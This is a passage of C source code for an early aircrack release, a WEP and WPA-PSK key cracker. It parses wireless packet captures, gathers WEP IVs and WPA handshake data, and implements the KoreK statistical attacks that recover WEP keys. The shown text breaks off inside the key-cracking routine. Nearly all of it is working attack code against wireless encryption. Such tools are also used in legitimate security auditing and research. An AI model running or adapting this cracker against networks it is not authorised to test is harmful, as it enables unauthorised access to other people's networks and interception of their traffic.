/*
 *  802.11 40/104 bit WEP / WPA-PSK Key Cracker
 *
 *  Copyright (C) 2004,2005  Christophe Devine
 *
 *  Advanced WEP attacks developed by KoreK
 *  WPA-PSK  attack code developed by Joshua Wright
 *  SHA1 MMX assembly code written by Simon Marechal
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <pthread.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>

#include "crypto.h"
#include "pcap.h"
#include "uniqueiv.c"

#define SUCCESS  0
#define FAILURE  1
#define RESTART  2

#define SWAP(x,y) { uchar tmp = x; x = y; y = tmp; }

#ifdef __i386__

extern int shammx_init( uchar ctx[40] )
    __attribute__((regparm(1)));

extern int shammx_ends( uchar ctx[40], uchar digests[40] )
    __attribute__((regparm(2)));

extern int shammx_data( uchar ctx[40], uchar data[128], uchar buf[640] )
    __attribute__((regparm(3)));

#endif

#define BROADCAST "\xFF\xFF\xFF\xFF\xFF\xFF"

static uchar ZERO[32] =
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00";

struct options
{
    int amode;                  /* attack mode          */
    int essid_set;              /* essid set flag       */
    int bssid_set;              /* bssid set flag       */
    uchar essid[33];            /* target ESSID         */
    uchar bssid[6];             /* target BSSID         */
    int nbcpu;                  /* # of cracker threads */
    int is_quiet;               /* quiet mode flag      */

    uchar debug[64];            /* user-defined WEP key */
    uchar maddr[6];             /* MAC address filter   */
    int keylen;                 /* WEP key length       */
    int index;                  /* WEP key index        */
    int ffact;                  /* bruteforce factor    */
    int korek;                  /* attack strategy      */

    FILE *dict;                 /* dictionary file     */
    int no_stdin;               /* if dict == stdin     */

    int l33t;                   /* no comment           */
}
opt;

typedef struct { int idx, val; } vote;

struct WEP_data
{
    uchar key[64];              /* the current chosen WEP key   */
    uchar *ivbuf;               /* buffer holding all the IVs   */
    int nb_aps;                 /* number of targeted APs       */
    long nb_ivs;                /* # of unique IVs in buffer    */
    long nb_ivs_now;            /* # of unique IVs available    */
    int fudge[64];              /* bruteforce level (1 to 256)  */
    int depth[64];              /* how deep we are in the fudge */
    vote poll[64][256];         /* KoreK cryptanalysis results  */
}
wep;

struct WPA_data
{
    struct WPA_data *next;      /* next supplicant              */
    uchar stmac[6];             /* supplicant MAC               */
    uchar bssid[6];             /* authenticator MAC            */
    uchar snonce[32];           /* supplicant nonce             */
    uchar anonce[32];           /* authenticator nonce          */
    uchar keymic[16];           /* eapol frame MIC              */
    uchar eapol[256];           /* eapol frame contents         */    
    uchar essid[33];            /* network identifier           */
    int eapol_size;             /* eapol frame size             */
    int flags;
};

struct AP_data
{
    struct AP_data *next;       /* next AP in linked list       */
    uchar bssid[6];             /* access point MAC address     */
    uchar essid[33];            /* access point identifier      */
    uchar lanip[4];             /* IP address if unencrypted    */
    uchar *ivbuf;               /* table holding WEP IV data    */
    uchar **uiv_root;           /* IV uniqueness root struct    */
    long ivbuf_size;            /* IV buffer allocated size     */
    long nb_ivs;                /* total number of unique IVs   */
    int crypt;                  /* encryption algorithm         */
    int eapol;                  /* set if EAPOL is present      */
    int target;                 /* flag set if AP is a target   */
    struct WPA_data *wpa_1st;   /* linked list of supplicants   */
};

/* stats global data */

struct timeval t_begin;         /* time at start of attack      */
struct timeval t_stats;         /* time since last update       */
struct timeval t_kprev;         /* time at start of window      */
unsigned long nb_kprev;         /* last  # of keys tried        */
unsigned long nb_tried;         /* total # of keys tried        */

/* IPC global data */

struct AP_data *ap_1st;         /* first item in linked list    */
pthread_mutex_t mx_apl;        /* lock write access to ap ll   */
pthread_mutex_t mx_eof;        /* lock write access to nb_eof  */
pthread_cond_t  cv_eof;         /* read EOF condition variable  */
int  nb_eof = 0;                /* # of threads who reached eof */
long nb_pkt = 0;                /* # of packets read so far     */
int mc_pipe[256][2];            /* master->child control pipe   */ 
int cm_pipe[256][2];            /* child->master results pipe   */

#define N_ATTACKS 17

enum KoreK_attacks
{
    A_u15,                      /* semi-stable  15%             */
    A_s13,                      /* stable       13%             */
    A_u13_1,                    /* unstable     13%             */
    A_u13_2,                    /* unstable ?   13%             */
    A_u13_3,                    /* unstable ?   13%             */
    A_s5_1,                     /* standard      5% (~FMS)      */
    A_s5_2,                     /* other stable  5%             */
    A_s5_3,                     /* other stable  5%             */
    A_u5_1,                     /* unstable      5% no good ?   */
    A_u5_2,                     /* unstable      5%             */
    A_u5_3,                     /* unstable      5% no good     */
    A_u5_4,                     /* unstable      5%             */
    A_s3,                       /* stable        3%             */
    A_4_s13,                    /* stable       13% on q = 4    */
    A_4_u5_1,                   /* unstable      5% on q = 4    */
    A_4_u5_2,                   /* unstable      5% on q = 4    */
    A_neg                       /* helps reject false positives */
};

int K_COEFF[N_ATTACKS] =
{
    15, 13, 12, 12, 12, 5, 5, 5, 3, 4, 3, 4, 3, 13, 4, 4, -20
};

void eof_wait( int *eof_notified )
{
    if( *eof_notified == 0 )
    {
        *eof_notified++;

        /* tell the master thread we reached EOF */

        pthread_mutex_lock( &mx_eof );
        nb_eof++;
        pthread_cond_broadcast( &cv_eof );
        pthread_mutex_unlock( &mx_eof );
    }

    usleep( 100000 );
}

/* fread isn't atomic, sadly */

int atomic_read( int fd, int len, void *buf )
{
    int n;
    static int off1, off2;
    static void *buf1 = NULL;
    static void *buf2 = NULL;
    
    if( buf1 == NULL )
    {
        buf1 = malloc( 131072 );
        buf2 = malloc( 131072 );
        
        if( buf1 == NULL || buf2 == NULL )
            return( 0 );
            
        off1 = 0;
        off2 = 0;
    }


    if( len > 131072 - off1 )
    {
        off2 -= off1;

        memcpy( buf2, buf1 + off1, off2 );
        memcpy( buf1, buf2, off2 );

        off1 = 0;
    }
 
    if( off2 - off1 >= len )
    {
        memcpy( buf, buf1 + off1, len );
        off1 += len;
        return( 1 );
    }
    else
    {
        n = read( fd, buf1 + off2, 131072 - off2 );

        if( n <= 0 )
            return( 0 );

        off2 += n;

        if( off2 - off1 >= len )
        {
            memcpy( buf, buf1 + off1, len );
            off1 += len;
            return( 1 );
        }
    }

    return( 0 );
}

void read_thread( void *arg )
{
    int fd, n, z, fmt;
    int eof_notified = 0;

    uchar bssid[6];
    uchar stmac[6];
    uchar *buffer;
    uchar *h80211;
    uchar *p;

    struct pcap_pkthdr pkh;
    struct pcap_file_header pfh;
    struct AP_data *_ap, *ap;
    struct WPA_data *_wpa, *wpa;

    if( ( buffer = (uchar *) malloc( 65535 ) ) == NULL )
    {
        /* there is no buffer */

        perror( "malloc failed" );
        goto read_fail;
    }

    h80211 = buffer;

    if( ! opt.is_quiet )
        printf( "Opening %s\n", (char *) arg );

    if( strcmp( arg, "-" ) == 0 )
        fd = 0;
    else
    {
        if( ( fd = open( (char *) arg, O_RDONLY ) ) < 0 )
        {
            perror( "open failed" );
            goto read_fail;
        }
    }

    if( ! atomic_read( fd, 4, &pfh ) )
    {
        perror( "read(file header) failed" );
        goto read_fail;
    }

    fmt = FORMAT_IVS;

    if( memcmp( &pfh, IVSONLY_MAGIC, 4 ) != 0 )
    {
        fmt = FORMAT_CAP;

        if( pfh.magic != TCPDUMP_MAGIC &&
            pfh.magic != TCPDUMP_CIGAM )
        {
            fprintf( stderr, "Unsupported file format "
                             "(not a pcap or IVs file).\n" );
            goto read_fail;
        }

        /* read the rest of the pcap file header */

        if( ! atomic_read( fd, 20, (uchar *) &pfh + 4 ) )
        {
            perror( "read(file header) failed" );
            goto read_fail;
        }

        /* take care of endian issues and check the link type */

        if( pfh.magic == TCPDUMP_CIGAM )
            SWAP32( pfh.linktype );

        if( pfh.linktype != LINKTYPE_IEEE802_11 &&
            pfh.linktype != LINKTYPE_PRISM_HEADER )
        {
            fprintf( stderr, "This file is not a regular "
                             "802.11 (wireless) capture.\n" );
            goto read_fail;
        }
    }

    /* avoid blocking on reading the file */

    if( fcntl( fd, F_SETFL, O_NONBLOCK ) < 0 )
    {
        perror( "fcntl(O_NONBLOCK) failed" );
        goto read_fail;
    }

    while( 1 )
    {
        if( fmt == FORMAT_IVS )
        {
            /* read one IV */

            while( ! atomic_read( fd, 1, buffer ) )
                eof_wait( &eof_notified );

            if( buffer[0] != 0xFF )
            {
                /* new access point MAC */

                bssid[0] = buffer[0];

                while( ! atomic_read( fd, 5, bssid + 1 ) )
                    eof_wait( &eof_notified );
            }

            while( ! atomic_read( fd, 5, buffer ) )
                eof_wait( &eof_notified );
        }
        else
        {
            while( ! atomic_read( fd, sizeof( pkh ), &pkh ) )
                eof_wait( &eof_notified );

            if( pfh.magic == TCPDUMP_CIGAM )
                SWAP32( pkh.caplen );
            
            if( pkh.caplen <= 0 || pkh.caplen > 65535 )
            {
                fprintf( stderr, "\nInvalid packet capture length %d - "
                                 "corrupted file?\n", pkh.caplen );
                eof_wait( &eof_notified );
                _exit( FAILURE );
            }

            while( ! atomic_read( fd, pkh.caplen, buffer ) )
                eof_wait( &eof_notified );

            h80211 = buffer;

            if( pfh.linktype == LINKTYPE_PRISM_HEADER )
            {
                /* remove the prism header */

                n = *(int *)( h80211 + 4 );

                if( n < 8 || n >= (int) pkh.caplen )
                    continue;

                h80211 += n; pkh.caplen -= n;
            }
        }

        /* prevent concurrent access on the linked list */

        pthread_mutex_lock( &mx_apl );

        nb_pkt++;

        if( fmt == FORMAT_CAP )
        {
            /* skip packets smaller than a 802.11 header */

            if( pkh.caplen < 24 )
                goto unlock_mx_apl;

            /* skip (uninteresting) control frames */

            if( ( h80211[0] & 0x0C ) == 0x04 )
                goto unlock_mx_apl;

            /* locate the access point's MAC address */

            switch( h80211[1] & 3 )
            {
                case  0: memcpy( bssid, h80211 + 16, 6 ); break;
                case  1: memcpy( bssid, h80211 +  4, 6 ); break;
                case  2: memcpy( bssid, h80211 + 10, 6 ); break;
                default: memcpy( bssid, h80211 +  4, 6 ); break;
            }
        }

        if( memcmp( bssid, BROADCAST, 6 ) == 0 )
        {
            /* probe request or such - skip the packet */

            goto unlock_mx_apl;
        }

        if( memcmp( opt.maddr, ZERO,      6 ) != 0 &&
            memcmp( opt.maddr, BROADCAST, 6 ) != 0 )
        {
            /* apply the MAC filter */

            if( memcmp( opt.maddr, h80211 +  4, 6 ) != 0 &&
                memcmp( opt.maddr, h80211 + 10, 6 ) != 0 &&
                memcmp( opt.maddr, h80211 + 16, 6 ) != 0 )
                goto unlock_mx_apl;
        }

        /* search the linked list */

        _ap = NULL;
         ap = ap_1st;

        while( ap != NULL )
        {
            if( ! memcmp( ap->bssid, bssid, 6 ) )
                break;

            _ap = ap;
             ap = ap->next;
        }

        /* if it's a new access point, add it */

        if( ap == NULL )
        {
            if( ! ( ap = (struct AP_data *) malloc(
                             sizeof( struct AP_data ) ) ) )
            {
                perror( "malloc failed" );
                break;
            }

            memset( ap, 0, sizeof( struct AP_data ) );

            if( ap_1st == NULL )
                ap_1st = ap;
            else
                _ap->next = ap;

            memcpy( ap->bssid, bssid, 6 );

            ap->crypt = -1;
        }

        if( fmt == FORMAT_IVS )
        {
            ap->crypt = 2;

add_wep_iv:
            /* check for uniqueness first */

            if( ap->nb_ivs == 0 )
                ap->uiv_root = uniqueiv_init();

            if( uniqueiv_check( ap->uiv_root, buffer ) == 0 )
            {
                /* add the IV & first two encrypted bytes */

                n = ap->nb_ivs * 5;

                if( n + 5 > ap->ivbuf_size )
                {
                    /* enlarge the IVs buffer */

                    ap->ivbuf_size += 131072;
                    ap->ivbuf = (uchar *) realloc(
                                    ap->ivbuf, ap->ivbuf_size );

                    if( ap->ivbuf == NULL )
                    {
                        perror( "remalloc failed" );
                        break;
                    }
                }

                memcpy( ap->ivbuf + n, buffer, 5 );
                uniqueiv_mark( ap->uiv_root, buffer );
                ap->nb_ivs++;
            }

            goto unlock_mx_apl;
        }

        /* packet parsing: Beacon or Probe Response */

        if( h80211[0] == 0x80 ||
            h80211[0] == 0x50 )
        {
            if( ap->crypt < 0 )
                ap->crypt = ( h80211[34] & 0x10 ) >> 4;

            p = h80211 + 36;

            while( p < h80211 + pkh.caplen )
            {
                if( p + 2 + p[1] > h80211 + pkh.caplen )
                    break;

                if( p[0] == 0x00 && p[1] > 0 && p[2] != '\0' )
                {
                    /* found a non-cloaked ESSID */

                    n = ( p[1] > 32 ) ? 32 : p[1];

                    memset( ap->essid, 0, 33 ); 
                    memcpy( ap->essid, p + 2, n );
                }

                p += 2 + p[1];
            }
        }

        /* packet parsing: Association Request */

        if( h80211[0] == 0x00 )
        {
            p = h80211 + 28;

            while( p < h80211 + pkh.caplen )
            {
                if( p + 2 + p[1] > h80211 + pkh.caplen )
                    break;

                if( p[0] == 0x00 && p[1] > 0 && p[2] != '\0' )
                {
                    n = ( p[1] > 32 ) ? 32 : p[1];

                    memset( ap->essid, 0, 33 );
                    memcpy( ap->essid, p + 2, n );
                }

                p += 2 + p[1];
            }
        }

        /* check if data */

        if( ( h80211[0] & 0x0C ) != 0x08 )
            goto unlock_mx_apl;

        /* check minimum size */

        z = ( ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30 );

        if( z + 16 > (int) pkh.caplen )
            goto unlock_mx_apl;

        /* check the SNAP header to see if data is encrypted */

        if( h80211[z] != h80211[z + 1] || h80211[z + 2] != 0x03 )
        {
            /* check the extended IV flag */

            if( ( h80211[z + 3] & 0x20 ) == 0 )
            {
                /* check the WEP key index */

                if( opt.index != 0 &&
                    ( h80211[z + 3] >> 6 ) != opt.index - 1 )
                    goto unlock_mx_apl;

                /* save the IV & first two output bytes */

                memcpy( buffer    , h80211 + z    , 3 );
                memcpy( buffer + 3, h80211 + z + 4, 2 );

                ap->crypt = 2;  /* encryption = WEP */

                goto add_wep_iv;
            }

            ap->crypt = 3;      /* encryption = WPA */

            goto unlock_mx_apl;
        }

        if( ap->crypt < 0 )
            ap->crypt = 0;      /* no encryption */

        /* if ethertype == IPv4, find the LAN address */

        z += 6;

        if( z + 20 < (int) pkh.caplen )
        {
            if( h80211[z] == 0x08 && h80211[z + 1] == 0x00 &&
                ( h80211[1] & 3 ) == 0x01 )
                    memcpy( ap->lanip, &h80211[z + 14], 4 );

            if( h80211[z] == 0x08 && h80211[z + 1] == 0x06 )
                memcpy( ap->lanip, &h80211[z + 16], 4 );
        }

        /* check ethertype == EAPOL */

        if( h80211[z] != 0x88 || h80211[z + 1] != 0x8E )
            goto unlock_mx_apl;

        z += 2;

        ap->eapol = 1;

        /* check ver. == 1, type == 3 (key), desc. == 254 (WPA) */

        if( h80211[z    ] != 0x01 ||
            h80211[z + 1] != 0x03 ||
            h80211[z + 4] != 0xFE )
            goto unlock_mx_apl;

        ap->eapol = 0;
        ap->crypt = 3; /* set WPA */

        /* locate the supplicant's MAC address */

        switch( h80211[1] & 3 )
        {
            case  1: memcpy( stmac, h80211 + 10, 6 ); break;
            case  2: memcpy( stmac, h80211 +  4, 6 ); break;
            default: goto unlock_mx_apl;
        }

        _wpa = NULL;
         wpa = ap->wpa_1st;

        while( wpa != NULL )
        {
            if( ! memcmp( wpa->stmac, stmac, 6 ) )
                break;

            _wpa = wpa;
             wpa = wpa->next;
        }

        /* if it's a new supplicant, add it */

        if( wpa == NULL )
        {
            if( ! ( wpa = (struct WPA_data *) malloc(
                             sizeof( struct WPA_data ) ) ) )
            {
                perror( "malloc failed" );
                break;
            }

            memset( wpa, 0, sizeof( struct WPA_data ) );

            if( ap->wpa_1st == NULL )
                ap->wpa_1st = wpa;
            else
                _wpa->next = wpa;

            memcpy( wpa->stmac, stmac, 6 );
            memcpy( wpa->bssid, bssid, 6 );
        }

        /* frame 1: Pairwise == 1, Install == 0, Ack == 1, MIC == 0 */

        if( ( h80211[z + 6] & 0x08 ) != 0 &&
            ( h80211[z + 6] & 0x40 ) == 0 &&
            ( h80211[z + 6] & 0x80 ) != 0 &&
            ( h80211[z + 5] & 0x01 ) == 0 )
        {
            memcpy( wpa->anonce, &h80211[z + 17], 32 );

            wpa->flags |= 0x08;     /* authenticator nonce set */
        }

        /* frame 2 or 4: Pairwise == 1, Install == 0, Ack == 0, MIC == 1 */

        if( ( h80211[z + 6] & 0x08 ) != 0 &&
            ( h80211[z + 6] & 0x40 ) == 0 &&
            ( h80211[z + 6] & 0x80 ) == 0 &&
            ( h80211[z + 5] & 0x01 ) != 0 )
        {
            if( memcmp( &h80211[z + 17], ZERO, 32 ) != 0 )
            {
                memcpy( wpa->snonce, &h80211[z + 17], 32 );

                wpa->flags |= 0x10; /* supplicant nonce set */
            }
        }

        /* frame 3: Pairwise == 1, Install == 1, Ack == 1, MIC == 1 */

        if( ( h80211[z + 6] & 0x08 ) != 0 &&
            ( h80211[z + 6] & 0x40 ) != 0 &&
            ( h80211[z + 6] & 0x80 ) != 0 &&
            ( h80211[z + 5] & 0x01 ) != 0 )
        {
            if( memcmp( &h80211[z + 17], ZERO, 32 ) != 0 )
            {
                memcpy( wpa->anonce, &h80211[z + 17], 32 );

                wpa->flags |= 0x08; /* authenticator nonce set */
            }

            /* copy the MIC & eapol frame */

            wpa->eapol_size = ( h80211[z + 2] << 8 )
                            +   h80211[z + 3] + 4;

            memcpy( wpa->keymic, &h80211[z + 81], 16 );
            memcpy( wpa->eapol, &h80211[z], wpa->eapol_size );
            memset( wpa->eapol + 81, 0, 16 );

            wpa->flags |= 0x20;     /* eapol frame & keymic set */

            /* copy the key descriptor version */

            wpa->flags |= ( h80211[z + 6] & 7 );
        }

unlock_mx_apl:

        pthread_mutex_unlock( &mx_apl );
    }

read_fail:

    kill( 0, SIGTERM );
    _exit( FAILURE );
}

/* timing routine */

float chrono( struct timeval *start, int reset )
{
    float delta;
    struct timeval current;

    gettimeofday( &current, NULL );

    delta = ( current.tv_sec  - start->tv_sec  ) + (float)
            ( current.tv_usec - start->tv_usec ) / 1000000;

    if( reset )
        gettimeofday( start, NULL );

    return( delta );
}

/* signal-safe I/O routines */

int safe_read( int fd, void *buf, size_t len )
{
    int n;
    size_t sum = 0;
    char  *off = (char *) buf;

    while( sum < len )
    {
        if( ! ( n = read( fd, (void *) off, len - sum ) ) )
            return( 0 );

        if( n < 0 && errno == EINTR ) continue;
        if( n < 0 ) return( n );

        sum += n;
        off += n;
    }

    return( sum );
}

int safe_write( int fd, void *buf, size_t len )
{
    int n;
    size_t sum = 0;
    char  *off = (char *) buf;

    while( sum < len )
    {
        if( ( n = write( fd, (void *) off, len - sum ) ) < 0 )
        {
            if( errno == EINTR ) continue;
            return( n );
        }

        sum += n;
        off += n;
    }

    return( sum );
}

/* each thread computes the votes over a subset of the IVs */

int crack_wep_thread( void *arg )
{
    long xv, min, max;
    uchar R[256], jj[256];
    uchar S[256], Si[256];
    uchar K[64];

    uchar io1, o1, io2, o2;
    uchar Sq, dq, Kq, jq, q;
    uchar S1, S2, J2, t2;

    int i, j, B, cid = (long) arg;
    int votes[N_ATTACKS][256];

    for( i = 0; i < 256; i++ )
        R[i] = i;

    while( 1 )
    {
        if( safe_read( mc_pipe[cid][0], (void *) &B,
                sizeof( int ) ) != sizeof( int ) )
        {
            perror( "read B failed" );
            kill( 0, SIGTERM );
            _exit( FAILURE );
        }

        min = 5 * ( ( (     cid ) * wep.nb_ivs ) / opt.nbcpu );
        max = 5 * ( ( ( 1 + cid ) * wep.nb_ivs ) / opt.nbcpu );

        q = 3 + B;

        memcpy( K + 3, wep.key, B );
        memset( votes, 0, sizeof( votes ) );

        /* START: KoreK attacks */

        for( xv = min; xv < max; xv += 5 )
        {
            memcpy( K, &wep.ivbuf[xv], 3 );
            memcpy( S,  R, 256 );
            memcpy( Si, R, 256 );

            for( i = j = 0; i < q; i++ )
            {
                jj[i] = j = ( j + S[i] + K[i & (2 + opt.keylen)] ) & 0xFF;
                SWAP( S[i], S[j] );
            }

            i = q; do { i--; SWAP(Si[i],Si[jj[i]]); } while( i != 0 );

            o1 = wep.ivbuf[xv + 3] ^ 0xAA; io1 = Si[o1]; S1 = S[1];
            o2 = wep.ivbuf[xv + 4] ^ 0xAA; io2 = Si[o2]; S2 = S[2];
            Sq = S[q]; dq = Sq + jj[q - 1];

            if( S2 == 0 )
            {
                if( ( S1 == 2 ) && ( o1 == 2 ) )
                {
                    Kq = 1 - dq; votes[A_neg][Kq]++;
                    Kq = 2 - dq; votes[A_neg][Kq]++;
                }
                else if( o2 == 0 )
                {
                    Kq = 2 - dq; votes[A_neg][Kq]++;
                }
            }
            else
            {
                if( ( o2 == 0 ) && ( Sq == 0 ) )
                {
                    Kq = 2 - dq; votes[A_u15][Kq]++;
                }
            }

            if( ( S1 == 1 ) && ( o1 == S2 ) )
            {
                Kq = 1 - dq; votes[A_neg][Kq]++;
                Kq = 2 - dq; votes[A_neg][Kq]++;
            }

            if( ( S1 == 0 ) && ( S[0] == 1 ) && ( o1 == 1 ) )
            {
                Kq = 0 - dq; votes[A_neg][Kq]++;
                Kq = 1 - dq; votes[A_neg][Kq]++;
            }

            if( S1 == q )
            {
                if( o1 == q )
                {
                    Kq = Si[0] - dq; votes[A_s13][Kq]++;
                }
                else if( ( ( 1 - q - o1 ) & 0xFF ) == 0 )
                {
                    Kq = io1 - dq; votes[A_u13_1][Kq]++;
                }
                else if( io1 < q )
                {
                    jq = Si[( io1 - q ) & 0xFF];

                    if( jq != 1 )
                    {
                        Kq = jq - dq; votes[A_u5_1][Kq]++;
                    }
                }
            }

            if( ( io1 == 2 ) && ( S[q] == 1 ) )
            {
                Kq = 1 - dq; votes[A_u5_2][Kq]++;
            }

            if( S[q] == q )
            {
                if( ( S1 == 0 ) && ( o1 == q ) )
                {
                    Kq = 1 - dq; votes[A_u13_2][Kq]++;
                }
                else if( ( ( ( 1 - q - S1 ) & 0xFF ) == 0 ) && ( o1 == S1 ) )
                {
                    Kq = 1 - dq; votes[A_u13_3][Kq]++;
                }
                else if( ( S1 >= ( ( -q ) & 0xFF ) )
                         && ( ( ( q + S1 - io1 ) & 0xFF ) == 0 ) )
                {
                    Kq = 1 - dq; votes[A_u5_3][Kq]++;
                }
            }

            if( ( S1 < q ) && ( ( ( S1 + S[S1] - q ) & 0xFF ) == 0 )  &&
                ( io1 != 1 ) && ( io1 != S[S1] ) )
            {
                Kq = io1 - dq; votes[A_s5_1][Kq]++;
            }

            if( ( S1 > q ) && ( ( ( S2 + S1 - q ) & 0xFF ) == 0 ) )
            {
                if( o2 == S1 )
                {
                    jq = Si[(S1 - S2) & 0xFF];

                    if( ( jq != 1 ) && ( jq != 2 ) )
                    {
                        Kq = jq - dq; votes[A_s5_2][Kq]++;
                    }
                }
                else if( o2 == ( ( 2 - S2 ) & 0xFF ) )
                {
                    jq = io2;

                    if( ( jq != 1 ) && ( jq != 2 ) )
                    {
                        Kq = jq - dq; votes[A_s5_3][Kq]++;
                    }
                }
            }

            if( ( S[1] != 2 ) && ( S[2] != 0 ) )
            {
                J2 = S[1] + S[2];

                if( J2 < q )
                {
                    t2 = S[J2] + S[2];

                    if( ( t2 == q ) && ( io2 != 1 ) && ( io2 != 2 )
                        && ( io2 != J2 ) )
                    {
                        Kq = io2 - dq; votes[A_s3][Kq]++;
                    }
                }
            }

            if( S1 == 2 )
            {
                if( q == 4 )
                {
                    if( o2 == 0 )
                    {
                        Kq = Si[0] - dq; votes[A_4_s13][Kq]++;
                    }
                    else
                    {
                        if( ( jj[1] == 2 ) && ( io2 == 0 ) )
                        {
                            Kq = Si[254] - dq; votes[A_4_u5_1][Kq]++;
                        }
                        if( ( jj[1] == 2 ) && ( io2 == 2 ) )
                        {
                            Kq = Si[255] - dq; votes[A_4_u5_2][Kq]++;
                        }
                    }
                }
                else if( ( q > 4 ) && ( ( S[4] + 2 ) == q ) &&
                         ( io2 != 1 ) && ( io2 != 4 ) )
                {
                    Kq = io2 - dq; votes[A_u5_4][Kq]++;
                }
            }
        }

        /* END: KoreK attacks */

        if( safe_write( cm_pipe[cid][1], votes,
                sizeof( votes ) ) != sizeof( votes ) )
        {
            perror( "write votes failed" );
            kill( 0, SIGTERM );
            _exit( FAILURE );
        }
    }

    return( 0 );
}

/* test if the current WEP key is valid */

int check_wep_key( void )
{
    uchar K[64];
    uchar S[256];
    uchar R[256];
    uchar x1, x2;
    unsigned long xv;
    int i, j, n, match;

    nb_tried++;
    match = 0;

    memcpy( K + 3, wep.key, opt.keylen );

    for( i = 0; i < 256; i++ )
        R[i] = i;

    for( n = 0; n < 16; n++ )
    {
        xv = 5 * ( rand() % wep.nb_ivs );

        memcpy( K, &wep.ivbuf[xv], 3 );
        memcpy( S, R, 256 );

        for( i = j = 0; i < 256; i++ )
        {
            j = ( j + S[i] + K[i & (2 + opt.keylen)]) & 0xFF;
            SWAP( S[i], S[j] );
        }

        i = 1; j = ( 0 + S[i] ) & 0xFF; SWAP(S[i], S[j]);
        x1 = wep.ivbuf[xv + 3] ^ S[(S[i] + S[j]) & 0xFF];

        i = 2; j = ( j + S[i] ) & 0xFF; SWAP(S[i], S[j]);
        x2 = wep.ivbuf[xv + 4] ^ S[(S[i] + S[j]) & 0xFF];

        if( ( x1 == 0xAA && x2 == 0xAA ) ||
            ( x1 == 0xE0 && x2 == 0xE0 ) )
            match++;
    }

    if( match >= 12 )
        return( SUCCESS );

    return( FAILURE );
}

/* routine used to sort the votes */

int cmp_votes( const void *bs1, const void *bs2 )
{
    if( ((vote *) bs1)->val < ((vote *) bs2)->val )
        return(  1 );

    if( ((vote *) bs1)->val > ((vote *) bs2)->val )
        return( -1 );

    return( 0 );
}

/* display the current votes */

void show_wep_stats( int B, int force )
{
    float delta;
    struct winsize ws;
    int i, et_h, et_m, et_s;

    if( ioctl( 0, TIOCGWINSZ, &ws ) < 0 )
    {
        ws.ws_row = 25;
        ws.ws_col = 80;
    }

    if( chrono( &t_stats, 0 ) < 0.1 && force == 0 )
        return;

    chrono( &t_stats, 1 );

    delta = chrono( &t_begin, 0 );

    et_h =   delta / 3600;
    et_m = ( delta - et_h * 3600 ) / 60;
    et_s =   delta - et_h * 3600 - et_m * 60;

    if( opt.l33t )
        printf( "\33[34;1m" );

    printf( "\33[2;%dHaircrack 2.2\n\n", (ws.ws_col - 12) / 2 );

    if( opt.l33t )
        printf( "\33[33;1m" );

    printf( "\33[5;%dH[%02d:%02d:%02d] Tested %ld keys (got %ld IVs)\33[K",
            (ws.ws_col - 44) / 2, et_h, et_m, et_s, nb_tried, wep.nb_ivs_now );

    if( opt.l33t )
        printf( "\33[32;22m" );

    printf( "\33[7;4HKB    depth   byte(vote)\n" );

    for( i = 0; i <= B; i++ )
    {
        int j, k = ( ws.ws_col - 20 ) / 9;

        if( opt.l33t )
            printf( "   %2d  \33[1m%3d\33[22m/%3d   ",
                    i, wep.depth[i], wep.fudge[i] );
        else
            printf( "   %2d  %3d/%3d   ",
                    i, wep.depth[i], wep.fudge[i] );

        for( j = wep.depth[i]; j < k + wep.depth[i]; j++ )
        {
            if( j >= 256 ) break;

            if( wep.poll[i][j].val == 32767 )
            {
                if( opt.l33t )
                    printf( "\33[1m%02X\33[22m(+inf) ",
                            wep.poll[i][j].idx );
                else
                    printf( "%02X(+inf) ", wep.poll[i][j].idx );
            }
            else
            {
                if( opt.l33t )
                    printf( "\33[1m%02X\33[22m(%4d) ",
                            wep.poll[i][j].idx,
                            wep.poll[i][j].val );
                else
                    printf( "%02X(%4d) ",  wep.poll[i][j].idx,
                                           wep.poll[i][j].val );
            }
        }

        printf( "\n" );
    }

    if( B < opt.keylen - 1 )
        printf( "\33[J" );

    printf( "\n" );
}

/* This routine gathers and sorts the votes, then recurses until it *
 * reaches B == keylen. It also stops when the current keybyte vote *
 * is lower than the highest vote divided by the fudge factor.      */

int do_wep_crack( int B )
{
    struct AP_data *ap;
    int i, n, cid, *vi;
    int votes[N_ATTACKS][256];

    /* if last keybyte reached, check if the key is valid */

    if( B == opt.keylen )
    {
        if( ! opt.is_quiet )
            show_wep_stats( B - 1, 0 );

        if( check_wep_key() == SUCCESS )
        {
keyfound:
            if( opt.is_quiet )
                printf( "KEY FOUND! [ " );
            else
            {
                show_wep_stats( B - 1, 1 );

                if( opt.l33t )
                    printf( "\33[31;1m" );

                printf( "\33[K\33[%dCKEY FOUND! [ ",
                        ( 80 - 14 - opt.keylen * 3 ) / 2 );
            }

            for( i = 0; i < opt.keylen - 1; i++ )
                printf( "%02X:", wep.key[i] );
            printf( "%02X ]\n",  wep.key[i] );

            if( opt.l33t )
                printf( "\33[32;22m" );

            return( SUCCESS );
        }

        return( FAILURE );
    }

    /* 1st pass: compute the total number of available IVs */

    wep.nb_ivs_now = 0;
    wep.nb_aps = 0;
    ap = ap_1st;

    while( ap != NULL )
    {
        if( ap->crypt == 2 && ap->target )
        {
            wep.nb_ivs_now += ap->nb_ivs;
            wep.nb_aps++;
        }

        ap = ap->next;
    }

    if( wep.nb_ivs_now < 24 )
    {
        printf( "Not enough IVs (only got %ld).\n", wep.nb_ivs_now );
        return( FAILURE );
    }

    /* 2nd pass: create the main IVs buffer if necessary */

    if( wep.nb_ivs == 0 || wep.nb_ivs_now - wep.nb_ivs > 40000 )
    {
        if( wep.nb_aps == 1 )
        {
            ap = ap_1st;

